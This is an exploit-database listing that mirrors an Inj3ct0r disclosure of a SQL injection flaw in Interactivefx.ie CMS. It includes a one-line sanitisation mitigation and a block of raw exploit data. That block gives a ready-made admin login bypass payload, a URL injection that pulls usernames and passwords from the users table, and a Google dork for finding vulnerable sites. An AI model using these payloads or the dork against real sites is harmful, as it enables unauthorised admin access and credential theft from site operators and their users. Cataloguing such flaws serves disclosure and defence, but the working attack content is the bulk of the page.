header-logo
Suggest Exploit
vendor:
Interactivefx.ie CMS
by:
Inj3ct0r
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Interactivefx.ie CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Interactivefx.ie CMS SQL Injection Vulnerability

Interactivefx.ie CMS is vulnerable to SQL Injection. An attacker can exploit this vulnerability to bypass authentication in the admin panel by using the login 'or 1=1/*' and any password. Additionally, an attacker can exploit this vulnerability to extract sensitive information from the database by using the URL http://server/event-details.php?id=223'+select+username,password+from+users/*

Mitigation:

Developers should ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

================================================
Interactivefx.ie CMS SQL Injection Vulnerability
================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
#[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net


Site product: Interactivefx.ie
Product : Interactivefx.ie CMS
Google dork: "Copyright Interactivefx.ie"


Sql Inj3ct0r Exploit:

http://server/event-details.php?id=223'+select+username,password+from+users/*


Bypass authentication in admin panel:

login: or 1=1/*
pass: anypassyouwish

Navigation

Suggest Exploit

Services By CQR